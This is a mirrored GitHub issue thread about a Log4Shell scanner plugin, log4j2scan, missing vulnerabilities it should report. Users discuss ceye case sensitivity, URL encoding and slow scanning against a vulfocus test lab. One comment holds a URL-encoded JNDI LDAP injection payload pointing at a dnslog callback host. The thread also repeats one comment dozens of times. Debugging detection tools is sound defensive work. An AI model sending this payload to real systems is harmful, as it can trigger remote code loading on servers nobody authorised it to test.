Giter VIP home page Giter VIP logo

Comments (97)

r1ghrfhd avatar r1ghrfhd commented on July 21, 2024 1

ceye 大小写敏感 Response resp = client.newCall(HttpUtils.GetDefaultRequest(platformUrl + "v1/records?token=" + token + "&type=dns&filter=" + domain.substring(0, domain. 这里全部小写 所以返回data都是[]

from log4j2scan.

TheCryingGame avatar TheCryingGame commented on July 21, 2024

同感
image
image

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

同感 image image

请提供测试环境

from log4j2scan.

0xbinibini avatar 0xbinibini commented on July 21, 2024

确实扫出来没报,用volfocus的靶场试了下
image

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

$%7bjndi%3aldap%3a//1639370059934oyKHs.1yu1tg.dnslog.cn/ry%7d

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

wule108 avatar wule108 commented on July 21, 2024

0.6版本还没这个问题,0.7只能显示一个存在漏洞的ip资产

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

确实扫出来没报,用volfocus的靶场试了下 image

确认使用方法是否正确

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

dnslogcn跟自己编译的ceye测试都能有请求,但是dashboard这里不提示有漏洞。

请提供靶机环境,或确认是否是否为延迟造成的影响

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

ceye 大小写敏感 Response resp = client.newCall(HttpUtils.GetDefaultRequest(platformUrl + "v1/records?token=" + token + "&type=dns&filter=" + domain.substring(0, domain. 这里全部小写 所以返回data都是[]

问题已修正

from log4j2scan.

freeAhao avatar freeAhao commented on July 21, 2024

对所有参数url编码了,导致vulfocus靶场扫描不到漏洞。
Edit:编码确实也能触发漏洞

问题在于扫描速度太慢,没有写多线程,我这里一个请求fuzz到靶机超时也没有扫完,而结果显示是在所有的fuzz完成后的finalCheck里面,导致感觉扫不出来

from log4j2scan.

whwlsfb avatar whwlsfb commented on July 21, 2024

对所有参数url编码了,导致vulfocus靶场扫描不到漏洞。

可以扫到,可以看下上面的图片

from log4j2scan.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.